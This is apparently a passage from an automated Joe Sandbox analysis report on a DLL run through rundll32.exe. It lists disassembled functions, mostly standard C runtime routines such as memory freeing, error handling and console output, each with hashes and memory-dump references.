                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID: C:\Windows\SysWOW64\rundll32.exe
                      • API String ID: 0-2837366778
                      • Opcode ID: cdc0a3909b28b1e2ab310a7ddc6f6a095faf747ab68a6453d3d9467346a1a020
                      • Instruction ID: c311c43b4407f502fd36130cc06ff182c6e4a09cc8d646de150ad7c907820846
                      • Opcode Fuzzy Hash: cdc0a3909b28b1e2ab310a7ddc6f6a095faf747ab68a6453d3d9467346a1a020
                      • Instruction Fuzzy Hash: 59219271624585AF9B509EE58C80D9ABF6DEF813687114A25F8249B944E730FC508FB0
                      Function 6EB08FF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,?,6EB090B8,00000000,?,00000001,00000000,?,6EB0912F,00000001,FlsFree,6EB16E3C,FlsFree,00000000), ref: 6EB09087
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-
                      • API String ID: 3664257935-2084034818
                      • Opcode ID: 06b881eafa1578ce3f118c6deb3d8b7ce94ecd3ae45f9f2d46834607cd4fa714
                      • Instruction ID: 862724bd2a2fc9436e68248dafce8c9236644a1561d29d9291d5a1449066a5e6
                      • Opcode Fuzzy Hash: 06b881eafa1578ce3f118c6deb3d8b7ce94ecd3ae45f9f2d46834607cd4fa714
                      • Instruction Fuzzy Hash: B811CA32E55563ABDF524BE88C4578A7FA8DF827B0F114210E911E72C4E770FA0086E1
                      Function 6EB0A2D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EB0A28B,?,?,6EB0A253,?,00000001,?), ref: 6EB0A2EE
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EB0A301
                      • FreeLibrary.KERNEL32(00000000,?,?,6EB0A28B,?,?,6EB0A253,?,00000001,?), ref: 6EB0A324
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 8e077ca8ecd9df42c1f3a716ba9f09c11f9c481db67ac78dff73f2d9fea1d72d
                      • Instruction ID: c8b04f0296b601c3dbd75376e65041e89438f24f96dc89d93e938cb31fa7a4a0
                      • Opcode Fuzzy Hash: 8e077ca8ecd9df42c1f3a716ba9f09c11f9c481db67ac78dff73f2d9fea1d72d
                      • Instruction Fuzzy Hash: E4F08C3492555AFBDF019B90C91ABDD7EAAEB113A6F104064E401A2254CB318A00DB90
                      Function 6EB0E32E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 6EB0E346
                        • Part of subcall function 6EB0B90F: HeapFree.KERNEL32(00000000,00000000,?,6EB0AB0E), ref: 6EB0B925
                        • Part of subcall function 6EB0B90F: GetLastError.KERNEL32(?,?,6EB0AB0E), ref: 6EB0B937
                      • _free.LIBCMT ref: 6EB0E358
                      • _free.LIBCMT ref: 6EB0E36A
                      • _free.LIBCMT ref: 6EB0E37C
                      • _free.LIBCMT ref: 6EB0E38E
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 44633119317630c42d8073f41dd72556289c12d89db4f2dbac447e64e9f9132f
                      • Instruction ID: 6405ef4aebb6c3534fdce12b8186345d13e07c59ed4e303549f8488d5d6a09ff
                      • Opcode Fuzzy Hash: 44633119317630c42d8073f41dd72556289c12d89db4f2dbac447e64e9f9132f
                      • Instruction Fuzzy Hash: CBF03C314106899F9E65DED8D5C1D8E7FDDEA003203502C05F014D7940CB20FD808AA0
                      Function 6EB0BAFF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free
                      • String ID: *?
                      • API String ID: 269201875-2564092906
                      • Opcode ID: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
                      • Instruction ID: 8322ebb96110d89ad81b68f4fe8d681d23be101b7808b480fe975d713aba76e0
                      • Opcode Fuzzy Hash: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
                      • Instruction Fuzzy Hash: 9A6128B5E102599FDB54CFA9C8805EDFFF9EF48314B14856AD815E7308EB31AE418B90
                      Function 6EB08069 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 6472fd61edf39025600d8c488ac54b0b62b4a4ded221db27b78472e16715258d
                      • Instruction ID: 48cf446b8ae69a3b641ecf52e85efd62dacb76184dc4bd69eda41a86fe4878ee
                      • Opcode Fuzzy Hash: 6472fd61edf39025600d8c488ac54b0b62b4a4ded221db27b78472e16715258d
                      • Instruction Fuzzy Hash: 2D51D1766546C6AFEB158F91D850BAABFA8EF08314F10453DE91297290E731FA41CB90
                      Function 6EB0BA13 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 6EB0C035: _free.LIBCMT ref: 6EB0C043
                        • Part of subcall function 6EB0CC09: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6EB0D927,6EB0FBE4,0000FDE9,00000000,?,?,?,6EB0F95D,0000FDE9,00000000,?), ref: 6EB0CCB5
                      • GetLastError.KERNEL32 ref: 6EB0BA7B
                      • __dosmaperr.LIBCMT ref: 6EB0BA82
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6EB0BAC1
                      • __dosmaperr.LIBCMT ref: 6EB0BAC8
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                      • String ID:
                      • API String ID: 167067550-0
                      • Opcode ID: 033588c253019a15b24df9fad9ef87796db1bb46147af6fa1d6f56f66e467291
                      • Instruction ID: 38d4f500ecab762c4e7f9c11de9d3ac7837c3930e70385ef94fe4745baa315bb
                      • Opcode Fuzzy Hash: 033588c253019a15b24df9fad9ef87796db1bb46147af6fa1d6f56f66e467291
                      • Instruction Fuzzy Hash: 5D21B37161468AAF9B508FE5CCC4D9BBFACEF053687104928F82997148EB30FD008BE0
                      Function 6EB0B2CC Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,?,6EB0F6A4,?,00000001,6EB0D998,?,6EB0FB5E,00000001,?,?,?,6EB0D927,?,00000000), ref: 6EB0B2D1
                      • _free.LIBCMT ref: 6EB0B32E
                      • _free.LIBCMT ref: 6EB0B364
                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,6EB0FB5E,00000001,?,?,?,6EB0D927,?,00000000,00000000,6EB1CB78,0000002C,6EB0D998), ref: 6EB0B36F
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ErrorLast_free
                      • String ID:
                      • API String ID: 2283115069-0
                      • Opcode ID: 6cad8337d20421f87bcdd6c647fb27292f61416bb187f0f18dbb41d6a6fa6bdf
                      • Instruction ID: d55ccc961e5da6df866bbb8b12614a2b32e2f229627af84c2a0b4c7c7d65c8e6
                      • Opcode Fuzzy Hash: 6cad8337d20421f87bcdd6c647fb27292f61416bb187f0f18dbb41d6a6fa6bdf
                      • Instruction Fuzzy Hash: 931106326246836FEB1156F55DD6F9F2D6DEBC2778B340E28F128935D8EF21A8014520
                      Function 6EB10666 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6EB100CA,?,00000001,?,00000001,?,6EB0F633,?,?,00000001), ref: 6EB1067D
                      • GetLastError.KERNEL32(?,6EB100CA,?,00000001,?,00000001,?,6EB0F633,?,?,00000001,?,00000001,?,6EB0FB7F,6EB0D927), ref: 6EB10689
                        • Part of subcall function 6EB1064F: CloseHandle.KERNEL32(FFFFFFFE,6EB10699,?,6EB100CA,?,00000001,?,00000001,?,6EB0F633,?,?,00000001,?,00000001), ref: 6EB1065F
                      • ___initconout.LIBCMT ref: 6EB10699
                        • Part of subcall function 6EB10611: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EB10640,6EB100B7,00000001,?,6EB0F633,?,?,00000001,?), ref: 6EB10624
                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6EB100CA,?,00000001,?,00000001,?,6EB0F633,?,?,00000001,?), ref: 6EB106AE
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: f381d830b715f7125d44cdc738104bf6ef38a15c804768859e05f913f5e2cf88
                      • Instruction ID: 2ae8ebfb7fbac9d1dbc6beeb618525db1cc15ff4fa8006fe406542f7104e583b
                      • Opcode Fuzzy Hash: f381d830b715f7125d44cdc738104bf6ef38a15c804768859e05f913f5e2cf88
                      • Instruction Fuzzy Hash: 99F01C36514569FBCF625FD1CC09ACE3F66FB493B0B054414FA1986520D6328830EBA1
                      Function 6EB0AC4F Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 6EB0AC58
                        • Part of subcall function 6EB0B90F: HeapFree.KERNEL32(00000000,00000000,?,6EB0AB0E), ref: 6EB0B925
                        • Part of subcall function 6EB0B90F: GetLastError.KERNEL32(?,?,6EB0AB0E), ref: 6EB0B937
                      • _free.LIBCMT ref: 6EB0AC6B
                      • _free.LIBCMT ref: 6EB0AC7C
                      • _free.LIBCMT ref: 6EB0AC8D
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: ae2c53b06dfa661dfa7343fa3a8d3bd7a9725bb54d48bc33d79de083e8f4c9fe
                      • Instruction ID: f4967f1e6670a729c4bb0f29787f153c54b7439bb93f745934e740dcd1a3cda2
                      • Opcode Fuzzy Hash: ae2c53b06dfa661dfa7343fa3a8d3bd7a9725bb54d48bc33d79de083e8f4c9fe
                      • Instruction Fuzzy Hash: 5EE04F71430D659E8E519F5088434D93F35FF667343250416E40463E2CC7355A62DFC8
                      Function 6EB0A367 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID: C:\Windows\SysWOW64\rundll32.exe
                      • API String ID: 0-2837366778
                      • Opcode ID: e31feb16a13bd25231d9fc255fcf9591aee7e3079d8b7b3b75c89610554b4d07
                      • Instruction ID: d25880dd0512492b170c8bc3cfe97267c85de8967b265a3597c805efc85d7392
                      • Opcode Fuzzy Hash: e31feb16a13bd25231d9fc255fcf9591aee7e3079d8b7b3b75c89610554b4d07
                      • Instruction Fuzzy Hash: 9F416F75A10695AFDB12CFD9C8C59DEBFBCEF85360B244866E51497210EB70AA40CB90
                      Function 6EB0866A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6EB0868F
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: 6f73c28e62782816b114691407e1bb69f3610e76d033c8904780fc1d8aba2c1f
                      • Instruction ID: 9a5a63fd613aad8c526a5b04ed85672e00bb47c5c89a90f94b225089e02d24cb
                      • Opcode Fuzzy Hash: 6f73c28e62782816b114691407e1bb69f3610e76d033c8904780fc1d8aba2c1f
                      • Instruction Fuzzy Hash: 89415571900289AFCF06CFD4DC81AEEBFB6FF08304F158559EA18A6264D735AA51DB90